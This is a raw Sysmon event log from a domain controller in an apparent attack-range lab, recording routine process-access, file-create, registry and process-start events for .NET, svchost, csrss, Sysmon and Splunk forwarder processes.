10341000x80000000000000005326Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:19:59.094{08A6967A-44E2-6000-3201-000000009A01}22202424C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{08A6967A-44FF-6000-4001-000000009A01}4256C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+91db|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9168|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8fc5|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005338Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:20:05.782{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4505-6000-4201-000000009A01}1152C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005337Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:20:05.766{08A6967A-4286-6000-0500-000000009A01}6361144C:\Windows\system32\csrss.exe{08A6967A-4505-6000-4201-000000009A01}1152C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000005336Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:20:05.766{08A6967A-44E2-6000-3201-000000009A01}22202424C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{08A6967A-4505-6000-4201-000000009A01}1152C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+91db|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9168|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8fc5|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005335Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:20:05.297{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4505-6000-4101-000000009A01}3088C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005334Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:20:05.297{08A6967A-4286-6000-0500-000000009A01}636752C:\Windows\system32\csrss.exe{08A6967A-4505-6000-4101-000000009A01}3088C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000005333Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:20:05.297{08A6967A-44E2-6000-3201-000000009A01}22204356C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{08A6967A-4505-6000-4101-000000009A01}3088C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6d87|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2066|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8b84|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6ad3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+69a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+1f19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8198|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1d64|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+277a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2708|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 11241100x80000000000000005332Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.localDLL2021-01-14 13:20:05.047{08A6967A-44FF-6000-4001-000000009A01}4256C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_64\Temp\10a0-0\System.Data.dll2021-01-14 13:20:05.047 13241300x80000000000000005339Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-SetValue2021-01-14 13:20:08.532{08A6967A-4288-6000-1100-000000009A01}1192C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\W32Time\Config\LastKnownGoodTimeQWORD (0x01d6ea77-0xfae4f4b3) 10341000x80000000000000005369Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:20:15.845{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-450F-6000-4501-000000009A01}4392C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005368Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:20:15.845{08A6967A-4286-6000-0500-000000009A01}636652C:\Windows\system32\csrss.exe{08A6967A-450F-6000-4501-000000009A01}4392C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000005367Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:20:15.845{08A6967A-44E2-6000-3201-000000009A01}22204356C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{08A6967A-450F-6000-4501-000000009A01}4392C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6d87|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2066|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8b84|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6ad3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+69a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+1f19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8198|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1d64|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+277a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2708|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005366Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:20:15.829{08A6967A-4325-6000-BD00-000000009A01}30161356C:\Windows\system32\conhost.exe{08A6967A-450F-6000-4401-000000009A01}3056C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005365Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:20:15.829{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005364Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:20:15.829{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005363Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:20:15.829{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005362Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:20:15.829{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005361Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:20:15.829{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005360Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:20:15.829{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005359Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:20:15.829{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005358Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:20:15.829{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005357Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:20:15.829{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005356Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:20:15.829{08A6967A-4286-6000-0500-000000009A01}636752C:\Windows\system32\csrss.exe{08A6967A-450F-6000-4401-000000009A01}3056C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000005355Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:20:15.829{08A6967A-4325-6000-B900-000000009A01}11763752C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{08A6967A-450F-6000-4401-000000009A01}3056C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000005354Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:20:15.830{08A6967A-450F-6000-4401-000000009A01}3056C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{08A6967A-4286-6000-E703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165{08A6967A-4325-6000-B900-000000009A01}1176C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 11241100x80000000000000005353Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.localDLL2021-01-14 13:20:15.439{08A6967A-4505-6000-4201-000000009A01}1152C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_64\Temp\480-0\System.Windows.Forms.dll2021-01-14 13:20:15.439 10341000x80000000000000005352Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:20:15.157{08A6967A-4325-6000-BD00-000000009A01}30161356C:\Windows\system32\conhost.exe{08A6967A-450F-6000-4301-000000009A01}1252C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005351Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:20:15.157{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005350Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 